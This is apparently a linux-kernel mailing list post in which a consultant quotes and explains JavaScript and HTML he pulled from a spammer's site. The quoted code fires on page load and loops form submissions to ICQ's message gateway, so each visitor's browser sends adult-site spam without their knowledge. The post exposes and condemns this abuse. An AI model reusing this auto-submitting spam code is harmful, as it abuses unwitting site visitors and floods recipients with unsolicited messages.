I've dug around the html (manually reconstructed some of the oddball URLs)
on this guy's site... here's a page that's undoubtably causing people some
trouble...
// About the email being sent...
sentFrom= "Sex Hacker"; //your name
fromEmail="dude6hg56j@aol.com"; //your email
theSubject= "Hacked XXX Sites!!"; //subject line
...
document.forms[0].to.value=UIN
document.forms[0].fromemail.value=fromEmail
document.forms[0].from.value=sentFrom
document.forms[0].subject.value=theSubject
//document.forms[0].body.value=theMsg
document.stats.number.value=submitCount
document.forms[0].Send.click()
...
<body onLoad=document.stats.sendLoop.click()>
...
<form action=http://wwp.icq.com/scripts/WWPMsg.dll method=post target=output>
<input type=text name=from value=EliteHacker size=30 maxlength=40><br>
<input type=text name=fromemail value="me@mybest.com" size=30 maxlength=40><br>
<input type=text name=subject value=HackedSexSites size=30 maxlength=30><br>
<textarea name=body rows=10 cols=55 wrap=Virtual>
ACCESS about 100 XXX sites for free! Hacked by elite hackers! No banners, no
credit cards, no membership and no bullshit, go to
http://SEX.InteractWithMe.com you get direct membership access to the best
sex sites in the world NO CATCH. Go NOW to http://SEX.InteractWithMe.com
</textarea><br>
<input type=text name=to value= size=30 maxlength=20><br>
<input type=SUBMIT name=Send value=SendOnlyOneMessage>
</form>
<form name=stats>
<input type=button name=stop value=stop onClick=clearInterval(vcRunnerTimer);>
<input type=button name=sendLoop value=SendLoop onClick=vcRunnerTimer=setInterval('sender()',1000);>
attempted... <input type=text name=number size=7>
... does the area in 'textarea' look familiar? This particular page 'forces'
passers by to spam ICQ numbers (hence the UIN and the action pointing at
wwq.icq.com). I don't doubt that this guy has cobbled together a few
different pages and he cycles through 'em randomly, so that each visitor
spams out a new message, some via email, some via ICQ, etc.
This guy needs a lawyer to slap his pee-pee, hard. FWIW, he seems to be
getting his service from ixcis.net.
-- __________________________________________ | | | Rick Franchuk - TranSpecT Consulting | |______ ______| - mailto:rickf@transpect.net - -______ICQ_#_4435025_______-
- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/